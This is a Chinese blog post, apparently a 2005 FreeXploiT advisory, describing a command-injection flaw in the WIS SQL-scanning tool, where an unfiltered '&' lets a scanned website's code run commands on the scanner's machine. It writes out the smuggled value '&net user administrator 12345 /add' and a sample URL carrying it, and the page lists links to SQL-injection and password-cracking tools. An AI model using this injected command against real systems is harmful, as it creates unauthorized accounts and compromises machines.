小榕的WIS漏洞(ALLyeSNO) 【补充一下】

最新推荐文章于 2018-08-15 11:28:39 发布
原创 最新推荐文章于 2018-08-15 11:28:39 发布 · 2.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#user #date #asp #工具 #sql

博客介绍了WIS这一SQL漏洞扫描工具,它由小榕开发。该工具对&字符未严格过滤,导致可人为创建含&字符的语句。在扫描网站时,可在被扫描的asp代码中嵌入指令,如&net user administrator 12345 /add,从而执行任意代码。

Term     : FreeXploiT

Author : ALLyeSNO

Date      : 2005-2-2

WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码

&net user allyesno 12345 /add

不是wis&net user allyesno 12345 /add
而是 使用 wis对 某一个网站进行扫描的时候

我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add

当wis对它进行扫描的时候 结果如下

http://www.target.com/sqlbug?=sql&net user administrator 12345 /add

本地执行wis &net user allyesno 12345 /add  是肯定可以的 因为&是把两段指令连在一起执行

软件 流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
05-23
流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
SQL注入工具wed+wis全套下载
07-22
大名鼎鼎的小SQL注入工具包,有兴趣的朋友可以下载对网站的sql漏洞进行扫描测试,完善自己的网站漏洞
扫描工具--小工作室
注重长远 天天积累 cqujsjcyj
05-25 822
可扫描服务器漏洞   http://www.netxeyes.com/
sql注入分析工具wed+wis
06-06
好用的sql注入分析工具
FreeXploiT-个人程序/文章发布时间
FreeXploiT
01-06 1979
工具以及文章将分为内部和公开两种 内部发布的 将永远不对外发布1.backdoor : 菜菜 发布日期:? 正式发布:否 DEMO发布:否功能简介:连接反弹和主动两种 一个简单的cmdshell 可对进程操作 后门无进程发布性质:无限期计划搁置发布性质:?2.隐形的克隆帐号 : ALLyeSNO 发布日期:? 正式发布:否 DEMO发布:是功能简介:无限期计划搁置发布性质:FreeXploiT内部
写的sql注入工具wed+wis.rar
10-11
在这个场景中,"小写的sql注入工具wed+wis.rar" 提供了一种可能的方式来检测和测试系统是否存在SQL注入漏洞。 首先,我们需要了解SQL注入的基本原理。当用户在Web表单中输入数据,这些数据通常会被拼接到一个SQL...
出品sql注入工具wed+wis使用分享
标题中提到的“小写的sql注入工具wed+wis”指的是由安全研究者小开发的一款安全工具,用于对网站进行SQL注入测试和检测漏洞SQL注入(SQL Injection)是一种常见的网络攻击技术,攻击者通过在Web表单输入或直接...
发布高效SQL注入工具WED与扫描工具WIS
本文件标题为“小写的sql注入工具wed wis”,描述中提到的“WED.EXE”和“wis.exe”是小开发的两款辅助安全测试的工具,分别用于SQL注入攻击和后台管理路径扫描。以下将围绕标题、描述及相关知识点进行详细阐述...
超好用的SQL注入工具(wed.exe,wis.exe)及用其入侵的实例!!!
热门推荐
王百万的Blog
04-14 3万+
用小的流光的时候,启动时介绍了两个工具:一个是wed.exe,另一个是wis.exe。这两个工具都是用来测试和进行SQL注入的,其中wed.exe是探测管理员的用户名和密码,而wis.exe用来探测后台的登录页面!注意:使用这两个工具的时候,一定要关闭防火墙,因为大部分的杀毒软件都会认为它们是病毒!!!!!wed.exe会首先探测是否能进行SQL注入,如果不会,会立即返回!行的话,进行了
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8413
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
当我们完全控制CISCO路由器时能够做的事情
FreeXploiT
10-27 2433
|------------------------------- 翻译 by mix --------------------------------||----------------和以前一样,我要申明一下,我不是专业的翻译员-----------------||---------所以我也只能够根据我自己的理解,尽量符合原文意思的进行翻译----------||------------有能力的
黑客快速入门
相信自我
05-20 4408
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。 1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否
【实战】Serv-U "site chmod xxx" Exploit
FreeXploiT
03-30 2966
Serv-U "site chmod xxx" Exploit创建时间:2004-02-20文章属性:转载文章提交:velvet (zodiacsoft_at_hotmail.com)论坛登陆名: SWAN提交者邮件地址: ????提交者QQ号码: ????版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!标题: Serv-U "site ch
chrome插件draw.io代替visio成为流程图架构图制作新的利器
delacroix_xu的专栏
08-15 1万+
  draw.io   https://chrome.google.com/webstore/detail/drawio-desktop/aeeogemjbfojkdbabkhfiddigbhibhik?hl=en-GB   https://jingyan.baidu.com/article/c33e3f48eb4d05ea15cbb53e.html    
加密解密(FreeXploiT 整理)
FreeXploiT
11-04 1739
 工具介绍  通过上一节,我想大家己认识了什么是壳的概念了,也是说运行加壳程序时, 用户执行的实际上是这个外壳的程序,而这个外壳程序负责把用户原来的程序在内存中解压缩,并把控制权交还给解开后的真正的程序,由于一切工作都是在内存中运行,用户根本不知道也不需要知道其运行过程,只要执行起来没有变化就好。当时有些人担心这些解压缩的工作会给程序带来额外的运行时间,但实际上所有的可执行文件都要读到内存
史上最绝黑客入侵(黑客是这样练成的!!!)(ALLyeSNO)
FreeXploiT
11-14 2761
作者: allyesno [allyesno]    论坛用户回复   收藏   修改   删除 quest认为到目前为止,问题已有明确答案,本贴已被冻结,不再接受更多的回复 我们今晚的目标是 192.168.0.1  它是我们小区的FTP下载论坛里面有不少XXXX片。。所以我们。。咳咳  不是 是我们想检验一下我们这一年到底学了什么真的本事最终的目的是拿到论
教你使用visio 2013绘制产品流程图
u011159607的博客
06-23 6909
http://baijiahao.baidu.com/s?id=1582938032162779622&wfr=spider&for=pc1. 打开wisio2013后,将左侧形状区域切换到基本流程图形状,如下图:如果找不到基本流程图,可以在上方的搜索按钮中进行搜索,也可以点击更多形状进行查找。2. 选中左侧的流程形状,将其拖拽到纸张画布区域。如下图:3. 双击画布中的流程形状,进...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值